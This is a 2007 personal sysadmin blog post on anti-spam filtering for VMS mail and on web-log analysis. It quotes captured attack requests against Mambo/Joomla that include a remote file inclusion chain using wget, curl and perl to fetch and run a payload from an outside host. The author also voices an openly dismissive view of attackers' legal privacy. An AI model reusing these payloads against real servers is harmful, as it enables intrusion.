17-Sep-2007 – SYSMGR in the attic

Anti-spam results
One full week of activity:

* Passed: 123 messages (either because the content was Ok, or the sender has explicitly been allowed (so no check is done))
* Quarantained: 110 messages, 8 false positives (of which a few are normally considered SPAM but I opted in)
* Discarded : 52, 4 false positives
* Blocked on RBL : 581 (in total, I did not filter off same IP addresses – that wouldn’t have happened using the previous method)
* Relay attemps : 17 (apart from the two I did myself)

All in all it means that about 750 messages didn’t make it to VMS mail. That is, on avarage, 100 a day. 2/3 of them because the domain is blacklisted

SMTP did discard a few messages by the configuration, mainly based on domain (gmail and hotmail for instance) but I removed these restrictions because the spam filter seems to be working pretty well.

This sopam filtering has some side effects. None of them really serious.

Since these mesages do no longer are passed to the VMS SMTP client, they no longer show up in OPERATOR.LOG. As a result, the spam report that is updated daily won’t contain any new entries. That is reflected in this report: The anti-spam filter was put in place on 08-sep-2007, in the evebing (when I installed the license and did some minimal configuration):

8-SEP-2007 18:56:55.54 CLNTINRBL 216.130.65.7 9-SEP-2007 00:15:04.78 UNRSLVMF cutie@mailroad.org 9-SEP-2007 10:08:24.36 UNRSLVMF kritzingerzndw@vnux.com 9-SEP-2007 11:25:32.34 BADMF fdophdi@gmail.com 9-SEP-2007 18:18:18.62 UNRSLVMF Schwabuuys@163data.com.cn 11-SEP-2007 02:33:18.76 UNRSLVMF Paulus_eobio@163data.com.cn 12-SEP-2007 15:20:45.53 BADMF sarah9dale@hotmail.com 13-SEP-2007 20:37:52.66 NOSPAMRLY 127.0.0.1 as suspected SPAM ramon@vennik.com 15-SEP-2007 18:54:53.86 UNRSLVMF sac10125@teensadolescentes.com 16-SEP-2007 20:46:22.79 UNRSLVMF kees@mirabilis.com

The last of the “old” config is the one on 8-sep-2007 18:56 – and PMAS came into effect at about 20:00.

On 13-sep-2007. I lifted the restictions in the VMS SMTP server:

$ dir/dat tcpip$smtp_common:smtp.config


Directory SYS$SPECIFIC:[TCPIP$SMTP]
SMTP.CONFIG;58       13-SEP-2007 20:40:03.83

SMTP.CONFIG;57       12-SEP-2007 22:14:14.52

SMTP.CONFIG;56        5-JUL-2007 21:44:35.69

Total of 3 files.

so the one on that day is actually correct: The configuration file was changed after that message was received. Because SMTP had to be stopped and started, it’s even lated than the file date.

Why the last two slipped through the filter, I don’t know. Neither of them can be found in the PMAS logging, so they have not passed the normal route. They haven’t come from the webserver either – there is no hit in any of the logs for these timestamps.

The good news is that Operator.log is no longer poisened with these messages, causing a drastic decrease in size. It’s now about ahlf the size it ued to be.

The third side-effect will be that phishing attempts – like the ones I got from E[B/D]ay, Paypal and banks – won’t make it either. If they get into quarantaine or are discarded, I could still pick them up. But quite likely, their spamicity is so high (> 500) that they will be rejected anyway.

Side effects of changing web structure
Changes in the web structure should be taken into account in scanning the weblogs – and that is something I forgot. So the report on rejected calls contain a big lot of actually valid accesses. Because the scan will access all present files, and create a full new report, I could update the script and rerun it to create new logs. And found a few lines seem to be far too long to process:

19:08:48.60 > Read 1000, Written 3 %DCL-W-TKNOVF, command element is too long - shorten \212.72.162.197 - - [28/Aug/2007:08:56:18 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstar %DCL-W-TKNOVF, command element is too long - shorten \212.72.162.197 - - [28/Aug/2007:08:56:19 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaro %DCL-W-TKNOVF, command element is too long - shorten \212.72.162.197 - - [28/Aug/2007:08:56:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaronline.com/https%20;perl%20https%20;c 19:08:53.18 > Read 2000, Written 16

Little problem to be solved ;), it seems the longest records don’t fit:

Record format: Stream_LF, maximum 0 bytes, longest 731 bytes Record attributes: Carriage return carriage control

That would not be a problem, would it?

I tried assignuing a value to a symbol and that’s not a problem – I can add up to about 4000 bytes. So there is a difference in maximum size between directly assigning value, and when reading from a file.

It’s rather seldom, so don’t bother too much….

What has been the attempt: the GET refers a different file for each:

GET /index2.php? option=com_content& do_pdf=1& id=1index2.php? .... GET /index.php? option=com_content& do_pdf=1& id=1index2.php? .... GET /mambo/index2.php? ....

but the code is the same in all three (it’s all on one line, for clearity, I split it up):

_REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?& cmd=cd%20/tmp; wget%20ryanstaronline.com/https%20; perl%20https%20; curl%20-o%20http://ryanstaronline.com/https%20; perl%20https; %20; echo%20YYY; echo

w00tw00t*
A file often tried to be pushed or accessed is named “w00tw00t.at.isc.sans.<something>”. It doesn’t exist, of course. At least: it didn’t: I created one, for fun, to scare the kiddies off, to start with. Off course it doesn’t do any harm to them, for the time being: I may add some code to get as much data as possible and store it for reference and, in particular cases, publish it to the authorities. Not that it would help much, but they ask for it.
(Am I allowed to do so? Probably not, but I don’t care. I have enough indication that a file with this signature is often used to indicate an attempt to compromise the webserver. I don’t accept this and consider all rights to privacy of the individual void and of no value)

September 2007
M	T	W	T	F	S	S
« Aug				Oct »
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30